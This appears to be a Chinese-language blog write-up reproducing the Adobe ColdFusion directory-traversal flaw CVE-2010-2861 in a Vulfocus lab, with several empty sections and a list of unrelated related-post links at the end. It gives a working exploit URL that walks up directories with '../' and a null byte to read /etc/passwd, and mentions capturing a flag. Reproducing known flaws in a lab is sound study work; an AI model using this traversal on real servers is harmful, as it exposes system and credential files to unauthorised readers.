[文件读取]coldfusion 文件读取 (CVE-2010-2861)

1.1漏洞描述

|------|---------------|
| 漏洞编号 | CVE-2010-2861 |
| 漏洞类型 | 文件读取 |
| 漏洞等级 | ⭐⭐ |
| 漏洞环境 | VULFOCUS |
| 攻击方式 | |

描述: Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。

1.2漏洞等级

高危

1.3影响版本

Adobe ColdFusion 8、9版本

1.4漏洞复现

1.4.1.基础环境

访问`http://your-ip:8500/CFIDE/administrator/enter.cfm\`,可以看到初始化页面,输入密码\`admin\`,开始初始化整个环境。

1.4.2.前提

  • 网站后台地址:

  • 后台管理账密:

  • 后台登录地址

1.5深度利用

1.5.1漏洞点

访问

复制代码
http://192.168.1.232:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

用burp截取,删除其中的cookie信息后,即可读取文件`/etc/passwd`:

删掉后

查找falg

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

  • 升级
  • 打补丁
  • 上设备
相关推荐
GoFly开发者2 小时前
Go语言开发框架GoFlyGen新增 网站安全助手 插件,帮助开发者提供应用安全防护,保障平台系统数据安全。
网络·安全
笺落彼岸2 小时前
SpringBoot3 JDK17集成proguard实现混淆打包
安全·https
happyprince2 小时前
07_NVIDIA_ModelOpt-Recipe配方系统
网络·modelopt
甄同学2 小时前
第十七篇:Bash Executor命令执行器,安全运行Shell命令
开发语言·安全·bash
h3guang Official3 小时前
K8s安全实战:从漏洞靶场到红蓝对抗
安全·容器·kubernetes
韦胖漫谈IT3 小时前
Apple M3 Max 与 Apple M5 Max 对比:本地算力的新旧王者之争
网络·人工智能·macos·transformer
treesforest4 小时前
做内容平台,IP地址精准定位和IP高精度定位查询怎么帮我们提升用户留存
网络·网络协议·tcp/ip
电商API_180079052474 小时前
电商ERP 自动同步订单功能实现拆解与技术手段
服务器·前端·网络·爬虫
云计算-Security4 小时前
分组交换的可靠性来自哪里?
网络·智能路由器
星释4 小时前
鸿蒙智能体开发实战:29.智能体安全与成本优化
服务器·安全·华为·harmonyos·鸿蒙·智能体